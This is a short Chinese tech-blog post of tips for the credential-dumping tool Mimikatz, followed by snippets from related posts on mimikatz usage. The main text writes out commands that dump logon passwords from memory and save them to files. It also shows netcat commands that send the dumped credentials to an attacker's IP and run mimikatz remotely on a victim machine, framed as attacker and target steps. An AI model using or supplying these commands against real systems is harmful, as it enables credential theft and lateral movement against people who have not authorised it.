Mimikatz使用小技巧

最新推荐文章于 2025-11-18 21:05:26 发布
原创 最新推荐文章于 2025-11-18 21:05:26 发布 · 233 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#debug #leetcode #python #安全 #c++

本文介绍了Mimikatz的几种实用技巧,包括记录输出、导入本地文件、传输到远程机器及通过nc远程执行等方法。

大家都知道Mimikatz绝对是一款神器,这里就简单介绍下Mimikatz的使用小技巧~

1.记录 Mimikatz输出:

C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

2.将输出导入到本地文件:

C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

3.将输出传输到远程机器:
攻击者执行:

E:\>nc -lvp 4444

靶机执行:

C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit nc.exe -vv 192.168.52.1 4444

192.168.52.1 为攻击者IP

4.通过nc远程执行Mimikatz:
靶机执行:

C:\>nc -lvp 443

攻击者执行:

E:\>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe

192.168.52.128 为靶机 IP

KEY0NE
关注
mimikatz使用
谢公子的博客
07-26 3956
mimikatz mimikatz是法国人Gentil Kiwi 编写的一款 Windows 平台下的神器,它具备很多功能,其中最主要的功能是直接从lsass.exe进程里获取处于 active 状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。作者主页:http://blog....
mimikatz的基本使用
a3320315的博客
05-25 1万+
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
mimikatz使用
mirror97black的博客
04-11 7423
mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权 privilege::debug //提升权限(从administrator提升到system) 抓取hash sekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行) lsadump::lsa ...
如何使用mimikatz抓取Windows密码哈希?
最新发布
2501_93842368的博客
11-18 1041
管理员权限启动 → 2.提升权限 → 3. 用(内存凭证)或(SAM 数据库)抓取 → 4. 提取 NTLM 哈希或明文密码。在实战中,优先使用(实时内存抓取,包含明文和哈希),若需本地用户哈希则用,域环境下针对 DC 使用或 DCSync 命令。
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 2277
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...
mimikatz 使用
ZKCQM23的博客
09-09 4370
我就说一个,如果爆ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 右击以管理员身份打开就可以了 或者在开始菜单的CMD里,cd到目录打开
Mimikatz:深入解析Windows系统密码抓取技巧
- **渗透测试**:安全专家在得到授权的情况下,使用Mimikatz对系统的安全性进行测试,以检查是否存在风险。 - **内网渗透**:在内网环境中,攻击者可能利用Mimikatz获取域控制器的权限,进一步扩大攻击范围。 - **...
mimikatz学习Windows安全之访问控制模型(一)
ZAWX_NETSTARSEC的博客
08-19 772
mimikatz学习Windows安全之访问控制模型(一) 从mimikatz学习Windows安全之访问控制模型(一)0x00 前言0x01 访问控制模型简介1. 访问令牌(Access Token)2. 安全描述符(Security Descriptor)3. 权限检查的过程0x02 Mimikatz的Token模块1. token::whoami2. token::list3. token::elevate4. token::run5. token::revert0x03 令牌窃取1. 原理2.
Lazykatz v4.0:基于Mimikatz的高级隐蔽渗透工具
例如,通过使用汇编级别的系统调用号直接发起 NT 内核请求,绕开被 Hook 的 ntdll.dll 函数入口,这种方法已经被多个 APT 组织广泛采用,而 Lazykatz 很可能是将这些技术进行了模块化封装,使其更易于被红队人员部署...
安全研究】从mimikatz学习Windows安全之访问控制模型(一)
ZAWX_NETSTARSEC的博客
08-13 415
作者:Loong716@Amulab 0x00 前言 Mimikatz是法国安全研究员Benjamin Delpy开发的一款安全工具。ST测试人员对mimikatz印象最深的肯定就是抓取Windows凭证,但作者对它的描述是“a tool I’ve made to learn C and make somes experi...
红队小技巧
weixin_43570648的博客
07-12 952
原文链接:(我直接粘贴过来没有图片) https://xz.aliyun.com/t/9773 前言 有一段时间没有写文章了,也不知写什么,毕竟从攻击方换成防守方,乙方换到甲方,还有些许不适应。。。但还是决定把自己接触渗透所积累的东西也拿出分享,不管糟粕,还是大伙觉得我分享的有用(那阿鑫自然是很开心),希望能帮到还在学习路上的朋友,文章若有错误,请及时联系我指出,我也不想误导才学习的朋友。此外,本文为口嗨文,基本在说思路,没有实操。 web端 (1)信息收集 收集cms信息: 1.通过云溪,wapplayz
Mimikatz使用(黄金票据的制作)
jzm__123的博客
12-18 1221
在他的工作范围内,他可以获取当前windows 的密码哈希值或者sid 和等来合成黄金票据的所需材料,这使我们的电脑十分危险,如果让我们的电脑遭受了他的攻击那么我们的会遭受到信息泄露,或者被注入病毒等一系列问题。孤独没有什么反义词,但他的近义词是自由,人生成功的道路上充满了孤独,那么也同样告诉你,你离成功后的自由不远了。黄金票据,打个比方,在生活中有一种非常牛的卡,一般存在于富豪手中,有了他,那么你就可以无所不能。username hacker (冒充的用户)3测试用的用户名(虚构的,或者用来冒充的)
Mimikatz使用方法
她叫常玉莹
08-21 1万+
Mimikatz命令抓取明文密码模块sekurlsa模块kerberos模块lsadump模块WDigestLSA保护获取高版本Windows系统的密码凭证msf中kiwi模块kiwi模块使用kiwi模块命令creds_allkiwi_cmd Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 Mimikatz命令 cls:清屏 standa..
mimikatz使用以及源码动态分析
weixin_46956745的博客
05-08 3685
mimikatz使用以及源码分析 文章目录mimikatz使用以及源码分析前言一、mimikatz安装运行二、mimikatz源码分析1.函数具体功能2.函数源码分析(动态)总结 前言 Mimikatz 是法国人 Gentil Kiwi 编写的一款 windows 平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取 windows 处于 active 状态账号的明文密码。mimikatz 的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz
mimikatz使用详解
qq_59468567的博客
04-12 1426
该模块是用于提权的模块,很多模块需要高权限运行,所以要先进行提权,只能用具有管理员权限的命令行窗口才可以执行成功,普通用户使用提权命令会失败。其中常用的是privilege、sekurlsa、kerberos、lsadump、token、sid模块。改模块是对Local Security Authiruty(LSA)进行密码抓取的模块。使用该模块需要高权限,因此需要执行提权命令,如下是常用命令。该模块是与Kerberos相关的模块。• privilege 提权模块。• kerberos包模块。
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 9万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
内网渗透工具mimikatz使用
qq_64787896的博客
03-24 1685
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等 lsadump::dcsync /domain:kevin.com /user:root (在域控上执行)读取所有域用户的哈希 lsadump::lsa /patch 从sam.hive和system.hive文件中获得NTLM Hash lsadump::sam /sam:sam.hive /system:system.hive 从本地SAM文件中读取密码哈希 token::elevate lsadump::sam。
mimikatz--安装、使用
hj06112的博客
08-07 1746
内网工具--mimikatz的安装、使用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值